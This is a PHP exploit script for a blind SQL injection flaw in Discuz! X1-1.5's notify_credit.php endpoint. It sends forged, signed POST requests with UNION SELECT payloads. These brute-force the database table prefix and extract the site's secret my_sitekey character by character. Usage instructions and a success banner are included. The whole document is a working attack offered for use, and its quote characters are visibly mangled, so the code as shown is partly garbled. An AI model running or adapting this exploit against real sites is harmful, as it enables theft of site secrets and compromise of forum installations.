- <?php
- print_r(`
- +—————————————————————————+
- Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit
- by toby57 2010.11.05
- mail: toby57 at 163 dot com
- team: http://www.wolvez.org
- +—————————————————————————+
- `);
- if ($argc < 2) {
- print_r(`
- +—————————————————————————+
- Usage: php `.$argv[0].` url [pre]
- Example:
- php `.$argv[0].` http://localhost/
- php `.$argv[0].` http://localhost/ xss_
- +—————————————————————————+
- `);
- exit;
- }
- error_reporting(7);
- ini_set(`max_execution_time`, 0);
- $url = $argv[1];
- $pre = $argv[2]?$argv[2]:`pre_`;
- $target = parse_url($url);
- extract($target);
- $path .= `/api/trade/notify_credit.php`;
- $hash = array();
- $hash = array_merge($hash, range(48, 57));
- $hash = array_merge($hash, range(97, 102));
- $tmp_expstr = “`”;
- $res = send();
- if(strpos($res,`SQL syntax`)==false){var_dump($res);die(`Oooops.I can NOT hack it.`);}
- preg_match(`/FROMs([a-zA-Z_]+)forum_order/`,$res,$match);
- if($match[1])$pre = $match[1];
- $tmp_expstr = “` UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE “=`”;
- $res = send();
- if(strpos($res,“doesn`t exist”)!==false){
- echo “Table_pre is WRONG!
Ready to Crack It.Please Waiting..
“; - for($i = 1;$i<20;$i++){
- $tmp_expstr = “` UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE `%forum_post_tableid%` AND LENGTH(REPLACE(table_name,`forum_post_tableid`,“))=$i AND “=`”;
- $res = send();
- if(strpos($res,`SQL syntax`)!==false){
- $pre = “;
- $hash2 = array();
- $hash2 = array_merge($hash2, range(48, 57));
- $hash2 = array_merge($hash2, range(97, 122));
- $hash2[] = 95;
- for($j = 1;$j <= $i; $j++){
- for ($k = 0; $k <= 255; $k++) {
- if(in_array($k, $hash2)) {
- $char = dechex($k);
- $tmp_expstr = “` UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE `%forum_post_tableid%` AND MID(REPLACE(table_name,`forum_post_tableid`,“),$j,1)=0x{$char} AND “=`”;
- $res = send();
- if(strpos($res,`SQL syntax`)!==false){
- echo chr($k);
- $pre .= chr($k);break;
- }
- }
- }
- }
- if(strlen($pre)){echo ”
“;break;}else{die(`GET Table_pre Failed..`);}; - } } };
- echo “Please Waiting….
“; - $sitekey = “;
- for($i = 1;$i <= 32; $i++){
- for ($k = 0; $k <= 255; $k++) {
- if(in_array($k, $hash)) {
- $char = dechex($k);
- $tmp_expstr = “` UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND “=`”;
- $res = send();
- if(strpos($res,`SQL syntax`)!==false){
- echo chr($k);
- $sitekey .= chr($k);break;
- }}}}
- if(strlen($sitekey)!=32)die(”
“.`can NOT get the my_sitekey..`); - echo ”
“.`Exploit Successfully.`.”
my_sitekey:{$sitekey}”; - exit;
- function sign($exp_str){
- return md5(“attach=tenpay&mch_vno={$exp_str}&retcode=0&key=”);
- }
- function send(){
- global $host, $path, $tmp_expstr;
- $expdata = “attach=tenpay&retcode=0&trade_no=%2527&mch_vno=”.urlencode(urlencode($tmp_expstr)).“&sign=”.sign($tmp_expstr);
- $data = “POST $path HTTP/1.1
“; - $data .= “Host: $host
“; - $data .= “Content-Type: application/x-www-form-urlencoded
“; - $data .= “Content-Length: “.strlen($expdata).”
“; - $data .= “Connection: Close
; - $data .= $expdata;
- $fp = fsockopen($host, 80);
- fputs($fp, $data);
- $resp = “;
- while ($fp && !feof($fp))
- $resp .= fread($fp, 1024);
- return $resp;
- }
- ?>